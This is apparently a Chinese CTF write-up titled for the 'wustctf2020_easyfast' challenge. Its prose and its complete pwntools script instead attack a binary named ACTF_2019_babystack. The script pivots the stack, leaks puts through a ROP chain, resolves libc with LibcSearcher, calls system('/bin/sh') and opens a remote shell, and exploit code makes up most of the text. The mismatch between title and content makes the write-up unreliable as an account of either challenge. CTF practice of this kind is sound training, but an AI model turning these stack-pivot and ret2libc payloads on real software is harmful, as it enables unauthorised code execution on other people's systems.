wustctf2020_easyfast
惯例我们先来checksec一下
开启了NX保护的64位程序 放进ida64里看看
可以发现我们最大可以输入的大小是0xe0也就是说可以溢出一个rbp和ret addr的距离因此考虑栈迁移
关于栈迁移的知识点大家可以去看Max1z师傅的这篇博客 写的很详细 也很清楚
由于题目中已经为我们提供了我们写入的地址 我们只需要将其接收即可
io.recvuntil(b"message?\n")
payload=str(0xe0)
io.sendline(payload)
io.recvuntil(b"0x")
addr=int(io.recv(12),16)
然后利用栈迁移打印puts_addr将其接收后利用LibcSearcher来获得libc 然后计算出基地址 再通过及地址计算出system和/bin/sh的地址 最后返回main函数开头为下一次栈迁移做准备
print(hex(addr))
payload=b'aaaaaaaa'
payload+=p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
payload=payload.ljust(0xd0,b'a')
payload+=p64(addr)+p64(leave)
io.send(payload)
puts_addr = u64(io.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
print(hex(puts_addr))
libc=LibcSearcher('puts',puts_addr)
base=puts_addr-libc.dump('puts')
system=libc.dump('system')+base
bin_sh=libc.dump('str_bin_sh')+base
第二次我们先重复第一个步骤获取栈地址
然后我们利用栈迁移执行system(/bin/sh)来获取控制权 最后cat flag即可
io.recvuntil(b"message?\n")
payload=str(0xe0)
io.sendline(payload)
io.recvuntil(b"0x")
addr=int(io.recv(12),16)
payload=b'aaaaaaaa'+p64(ret)
payload+=p64(rdi) + p64(bin_sh) + p64(system) + p64(main)
payload=payload.ljust(0xd0,b'a')
payload+=p64(addr)+p64(leave)
io.send(payload)
exp:
from pwn import *
from LibcSearcher import *
#io=process("./ACTF_2019_babystack")
io=remote('node4.buuoj.cn',25048)
elf=ELF('./ACTF_2019_babystack')
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main=0x4008F6
leave=0x400a18
ret=0x400709
rdi=0x400ad3
io.recvuntil(b"message?\n")
payload=str(0xe0)
io.sendline(payload)
io.recvuntil(b"0x")
addr=int(io.recv(12),16)
print(hex(addr))
payload=b'aaaaaaaa'
payload+=p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
payload=payload.ljust(0xd0,b'a')
payload+=p64(addr)+p64(leave)
io.send(payload)
puts_addr = u64(io.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
print(hex(puts_addr))
libc=LibcSearcher('puts',puts_addr)
base=puts_addr-libc.dump('puts')
system=libc.dump('system')+base
bin_sh=libc.dump('str_bin_sh')+base
io.recvuntil(b"message?\n")
payload=str(0xe0)
io.sendline(payload)
io.recvuntil(b"0x")
addr=int(io.recv(12),16)
payload=b'aaaaaaaa'+p64(ret)
payload+=p64(rdi) + p64(bin_sh) + p64(system) + p64(main)
payload=payload.ljust(0xd0,b'a')
payload+=p64(addr)+p64(leave)
io.send(payload)
io.interactive()